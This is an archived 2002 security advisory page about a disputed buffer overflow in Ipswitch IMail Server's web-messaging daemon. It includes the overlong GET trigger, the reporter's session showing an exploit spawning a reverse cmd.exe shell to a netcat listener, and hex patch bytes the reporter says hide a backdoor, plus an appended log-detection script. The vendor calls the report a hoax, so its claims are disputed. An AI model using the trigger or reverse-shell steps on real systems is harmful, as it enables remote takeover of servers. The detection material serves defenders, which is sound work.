SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Server)  >   IMail Server
Vendors:   Ipswitch
(Author Reiterates That The Vulnerability Exists) Re: Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access
SecurityTracker Alert ID:  1004872
SecurityTracker URL:  http://securitytracker.com/id/1004872
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 30 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 7.11 HF1 and prior versions
Description:   A buffer overflow vulnerability was reported in Ipswitch's IMail Server. A remote user can execute arbitrary code on the server with System level privileges.

The overflow is reported in the Web Messaging daemon (the web mail interface; it listens on TCP port 8383 in the report below) when a GET request carries an overly long request-URI together with an HTTP/1.0 version token. The same request-URI sent in HTTP/0.9 form (no version token) or as HTTP/1.1 reportedly does not trigger the flaw. A remote user can send a GET request of the following form to trigger it (the request-URI is a single run of several hundred 'x' characters, wrapped here for display):

GET
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx
HTTP/1.0

[Editor's note: In response to the original report, the vendor stated that the vulnerability does not exist and that the report may be a hoax, and suggested that the "patch" distributed with the report might itself open a vulnerability. The author of the original report has responded that the vulnerability does exist, and has supplied the session transcript and log excerpt reproduced below.]

Impact:   A remote user can execute arbitrary code with System level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/IMail_Server/index.html
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   This archive entry is a follow-up to the message listed below.
Jul 26 2002 Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access



 Source Message Contents

Subject:  Re: Hoax Exploit (2c79cbe14ac7d0b8472d3f129fa1df55 RETURNS)


uh, ok

first of all, I haven't been able to respond to any mail since saturday 
afternoon as some nice person/vendor filed a phony abuse report with the 
intelligent people of yahoo inc., and had my account suspended and banned.. 
if you sent any email since saturday, please resend it here.. I'm sure I'll 
have a week or so to read it before I am ABUSE REPORT H4XED..

first off, maybe the exploit isn't working on your system.. hmm, possible I 
guess?.. the described situation is still quite repeatable so what the hell:

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143

[....]


hmm, looks like IMail 7.11 to me? how about you?


xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx 
HTTP/1.0

Connection closed by foreign host.


uh oh, that isn't supposed to happen!@ let's chex those logs!


20020729 162041 Info - 192.168.0.1   GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1   GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxx.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 
from 192.168.0.1.


hey, look mom.. a dead thread! looks like an overflow to me, let's use that 
elite exploit I found on bugtraq!@


xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

ret: 0x10012490 (IMailsec.dll v.2.6.17.28)

connecting...done.
dumping payload...done.

cmd.exe spawned to [192.168.0.1:3333]

xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\WINNT\system32>


seems to work fine to me.. what the hell is going on at ipswitch? is it time 
to fire someone?

as for the patch being a vulnerability.. the binary was compiled with the 
default switches using Borland C++ 5.5 so that's why it's large.. but it's 
the same damn source, so fuck the binary then.. compile from the source:

char p1[] = {0x00,0x30};
//extend text section to make room for our code

char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90};
//on a command request, CALL 4A345E;NOP

char p3[] = 
{0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3};
//disassembly below

.text:004A345E                 cmp     [esp+arg_354], 20544547h
.text:004A3469                 jnz     short loc_4A3473
//is the argument "USER"? no? get out of this shit
.text:004A346B                 mov     [esp+arg_3AE], 0
//yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473:                             ; CODE XREF: sub_4A345E+Bj
.text:004A3473                 lea     eax, [ebp-1210h]
//shit we ran over to get here
.text:004A3479                 retn

huh? looks like a backdoor to me..

@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55


>Hello,

>In message 284465 there is an "exploit" of IMail Server from Ipswitch
>listed.

>http://online.securityfocus.com/archive/1/284465

>We have been unable to duplicate the problem and the code attached to the
>above message is unknown in nature.  We suspect that the "patch" released
>in the message is actually designed to open a vulnerability.  At this time
>we are advising our users that this advisory is a hoax and to not apply
>the patch.  I would like to request that the message be removed to prevent
>further confusion.  Thank you.

>John Korsak
>Product Marketing Manager, IMail Server
>(781) 676-5789



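The log excerpt in the message above is the detection signal an operator actually has: a GET line with a huge request-target from one client, followed within seconds by a "Web Error Problem in ThreadProc" entry naming the same client and port 8383. The script below is an added example, not part of the advisory or of the poster's message. It assumes the one-entry-per-line layout visible in the excerpt (date, time, then either "Info - <client>   <request>." or the ThreadProc error; the e-mail merely wrapped those lines), the sample lines are constructed here, and the 256-byte URI threshold and 5-second correlation window are arbitrary choices.

```python
import re
from datetime import datetime
from typing import Dict, List

URI_LIMIT = 256  # assumption: no legitimate web-mail URL on this daemon is this long

# Constructed sample in the one-entry-per-line layout the excerpt shows
SAMPLE_LOG = """\
20020729 162041 Info - 192.168.0.1   GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1   GET {long} HTTP/1.0.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 from 192.168.0.1.
20020729 162510 Info - 192.168.0.5   GET /index.html HTTP/1.1.
""".format(long="x" * 400)

ENTRY_RE = re.compile(r"^(\d{8}) (\d{6}) (.*)$")
# "Info - <client>   <method> <target>[ HTTP/x.y]."  (no version token = HTTP/0.9 request)
REQUEST_RE = re.compile(r"^Info - (\S+)\s+(\S+) (\S+)(?: (HTTP/\d\.\d))?\.$")
CRASH_RE = re.compile(r"^Web Error Problem in ThreadProc - Socket \d+ on port (\d+) from (\S+)\.$")


def parse(lines) -> List[Dict]:
    """Turn log lines into request / crash events; anything else is ignored."""
    events = []
    for line in lines:
        m = ENTRY_RE.match(line.rstrip("\r\n"))
        if not m:
            continue
        ts = datetime.strptime(m.group(1) + m.group(2), "%Y%m%d%H%M%S")
        body = m.group(3)
        r = REQUEST_RE.match(body)
        if r:
            events.append({"ts": ts, "kind": "request", "src": r.group(1), "method": r.group(2),
                           "uri": r.group(3), "version": r.group(4) or "HTTP/0.9"})
            continue
        c = CRASH_RE.match(body)
        if c:
            events.append({"ts": ts, "kind": "crash", "src": c.group(2), "port": int(c.group(1))})
    return events


def analyse(lines, uri_limit: int = URI_LIMIT, window_s: int = 5) -> List[Dict]:
    """Flag oversized request-targets, and escalate when the same client's worker
    thread dies within window_s seconds (the pattern in the posted log)."""
    events = parse(lines)
    long_reqs = [e for e in events if e["kind"] == "request" and len(e["uri"]) > uri_limit]
    alerts = [{"type": "long-uri", "src": e["src"], "ts": e["ts"],
               "version": e["version"], "uri_len": len(e["uri"])} for e in long_reqs]
    for crash in (e for e in events if e["kind"] == "crash"):
        for r in long_reqs:
            delta = (crash["ts"] - r["ts"]).total_seconds()
            if r["src"] == crash["src"] and 0 <= delta <= window_s:
                alerts.append({"type": "crash-after-long-uri", "src": crash["src"],
                               "ts": crash["ts"], "port": crash["port"], "version": r["version"]})
                break
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

A "long-uri" alert on its own is worth a look (a scanner, or a probe like the one earlier on this page); "crash-after-long-uri" means a worker thread actually died and the host should be treated as possibly compromised until the follow-up traffic from that client (a connect-back shell, as in the poster's transcript) has been ruled out.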

Copyright 2019, SecurityGlobal.net LLC